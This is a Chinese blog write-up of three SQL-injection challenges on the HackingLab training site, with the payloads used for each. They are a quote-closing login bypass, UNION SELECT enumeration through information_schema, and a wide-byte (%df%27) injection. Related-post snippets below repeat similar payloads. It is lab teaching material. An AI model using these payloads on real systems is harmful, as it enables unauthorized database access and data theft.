【writeup】网安实验室hackinglab 注入类

最新推荐文章于 2021-03-17 10:41:10 发布
最新推荐文章于 2021-03-17 10:41:10 发布
阅读量453 收藏 1
点赞数
分类专栏: web安全 sql注入 ctf靶场 文章标签: 网安实验室注入题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Oliver99877/article/details/102525067
版权

【题目1】

最简单的SQL注入

分值: 100

最简单的SQL注入

 

【思路】

  本题未做任何防护,可以考虑在用户名处:1' or 1=1 --      通过闭合单引号,然后注释掉后面原有的单引号来注入

  密码随便填写即可

 

【题目2】

最简单的SQL注入(熟悉注入环境)

分值: 100

最简单的SQL注入

 

【思路】

1. index.php?id=1'     发现报错回显

2. ?id=1 and 1=1       页面正常

3. 通过order by   发现共有三个字段

4. index.php?id=1 union select 1, TABLE_NAME, 3 from information_schema.TABLES where TABLE_SCHEMA = database()

     回显得知表名为   sae_user_sqli3

5. index.php?id=1 union select 1, COLUMN_NAME, 3 from information_schema.COLUMNS where TABLE_NAME = 'sae_user_sqli3'      回显得知 存在的三个字段 分别为 id, title, content   

6. index.php?id=1 union select 1, content, 3 from sae_user_sqli3       拿到flag

 

【题目3】   

防注入

分值: 300

小明终于知道,原来黑客如此的吊,还有sql注入这种高端技术,因此他开始学习防注入!

【思路】

1. index.php?id=1%df%27   发现页面回显报错,可能存在宽字节注入

2. index.php?id=1%df%27 order by 3  %23         有三个字段

3.  跟上一题一样,爆出表名,然后转成16进制

4. ?id=1%df%27  union select 1, group_concat(column_name), 2 from information_schema.COLUMNS where TABLE_NAME =  0x7361655f757365725f73716c6934  %23     爆出三个字段

5. ?id=1%df%27 union select 1, 2, content_1 from  sae_user_sqli4 limit 2,1 %23  拿到flag

Oliver99877
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HackingLab 注入
Galaxy_fan的博客
07-13 1420
$strsql="select * from `user` where userid=".intval($_GET['userid'])." and password='".md5($_GET['pwd'], true) ."'";
Hackinglab注入
weixin_30721899的博客
11-27 1410
基本关做过忘记做记录。没事做做注入关,做一下笔记。 1.最简单的SQL注入   Tips目里有简单提示.页面如下图。 说了有提示,就看看源码。 payload :admin ' or 1=1# 2.最简单的SQL注入(熟悉注入环境) pyload: http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92...
网络信息安全攻防学习平台HackingLab 综合关(第二
江湖
01-12 5655
没有注入到底能不能绕过登录 分值: 350 不是SQL注入 通关地址 目打开后显示 Login Burte Force,想着是爆破,随便拿了个字典跑了跑没结果,扫了下有个弱口令test:test。 显示key在admin界面,御剑扫了下后台admin也没结果,不过发现了robots.txt(御剑字典要把这个加进去,很常见)。 User-agent: * Disallo
hackinglab.cn注入关之六
r00tnb的博客
12-15 1340
目: 本目为手工注入学习目,主要用于练习基于Mysql报错的手工注入。Sqlmap一定能跑出来,所以不必测试了。flag中不带key和# writeup: 目上都说了是基于mysql报错的手工注入。 进入目后返回如下界面; username:admin status:ok 直接加单引号返回: Warning: mysql_fetch_row() expects ...
网络安全攻防实验室通关教程-注入
热门推荐
黑面狐
10-19 1万+
网络安全实验室传送门: 地址:http://hackinglab.cn  第一:最简单的SQL注入 查看网页源码,获取到提示,要登录admin 所以构造用户名  admin' or 'a'='a'#   密码随便填, 获取到flag 第2:最简单的sql注入(熟悉环境) 查看网页源码获得提示参数id=1  是数字型注入 于是构造url    index.
实验吧writeup Web方向
08-27
就是实验吧的一些writeup,,因缺思厅的绕过,让我进去,上传绕过, dvwa,简单的sql注入3
实验吧1867 writeup
10-24
实验吧1867-困在栅栏里的凯撒的解思路和过程
2023 强网杯 Writeup
最新发布
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战目的详细分析...
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。...
hackinglab注入关WP(二)
Yale的博客
04-07 1559
HACKLAB注入关(http://www.tuicool.com/articles/nMrqeay) 4.到底能不能回显 构造这个语句 ?start=0 procedure analyse(extractvalue(rand(),concat(1, 得到结果 XPATH syntax error: 'article,user'   知道现在的数据库中有两个表:article和user
注入所有php页面 $md5,每天一道CTF(9) Hackinglab 注入
weixin_34320235的博客
03-17 174
万能密码目中有提示,打开源码发现。万能密码 用户名 admin' or 1=1#密码任意过之。2-最简单的SQL注入(熟悉注入环境)UNION注入.根据源码Tip,在URL尾部加上 ?id=2,显示出第二篇文章。加上 AND 1=1和 AND 1=2发现输出不同,判断存在注入。在其后加入 OR 1=1爆出所有的文章,得到flag。3-防注入宽字节注入。各种尝试,在参...
C++中函数调用时的三种参数传递方式详解
qq_23923713的博客
11-28 357
原文地址:https://blog.csdn.net/ccblogger/article/details/77752659?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.control&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.co
hackinglab.cn 注入关之一
r00tnb的博客
12-15 3778
目: Tips目里有简单提示. writeup: 第一关应该挺简单的。 点击目地址进去,显示的是一个简单的登陆界面,还有一个验证码。 查看一下源代码,发现有一个提示: <!-- Tips login as admin--> 也就是说登录名已经告诉你了。 开始填写表单,登录名就写admin,密码随便填,验证码输入正确,等待返回结果是登录失败!预料之中,在登录名...
hackinglab-注入关-第1
u012851380的博客
11-20 866
输入用户名、密码为admin’ or ‘1’='1 flag出现
hackinglab.cn注入关之三
r00tnb的博客
12-15 1870
目: 小明终于知道,原来黑客如此的吊,还有sql注入这种高端技术,因此他开始学习防注入!(flag是随机序列) writeup: 点击目地址进去,发现一段话。 查看源代码,发现提示: <!-- tips: id=1 构造id参数的查询语句,各种试id的值,发现结果只有一句话和空白页两种情况。然后添加单引号发现返回空白页。 由于加单引号会出现空白页,没有报错,尝试宽字...
hackinglab.cn 注入关之二
r00tnb的博客
12-15 1621
目: 最简单的SQL注入writeup: 点击目地址可以看到一句没什么用的话。 一般提示应该在源代码中,果然: <!-- tips: id=1 在url后加?id=1连接后看结果,发现还是刚才那句话。改变id的数值试试,发现会有空白页的情况,在换成字符串试试(不要加引号)会有一个警告: Warning: mysql_fetch_row() expects pa...
hackinglab.cn 注入关之四
r00tnb的博客
12-15 1672
目: 小明经过学习,终于对SQL注入有了理解,她知道原来sql注入的发生根本原因还是数据和语句不能正确分离的原因,导致数据作为sql语句执行;但是是不是只要能够控制sql语句的一部分就能够来利用获取数据呢?小明经过思考知道,where条件可控的情况下,实在是太容易了,但是如果是在limit条件呢?   writeup: 写在前面:地址由于太长目地址就用url代替。 点击目进去, ...
《网络安全学习》第二部分-----SQL注入系列学习
tomatocc的博客
01-01 932
通过sql注入,绕过用户名和密码校验 数值型注入方式-------通过-1 or 1=1 原理: 例如我们后台有这样一个查询sql: SELECT * from user_message WHERE id= 那么我们可以通过修改前端的值位:-1 or 1=1 来实现查询所有的数据,其中-1表示永远不可能存在的数据。 字符串注入方式-------通过注释字符,来实现绕过 原理:由于#通常标识...
GKCTF2021-官方WriteUp.pdf
07-06
"GKCTF2021官方WriteUp包含了两个主要的Web安全挑战:ezcms和eznode。在ezcms中,利用模板注入和目录穿越漏洞获取flag;在eznode中,通过绕过严格过滤的WAF并利用原型链污染实现远程代码执行(RCE)" 在ezcms挑战中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值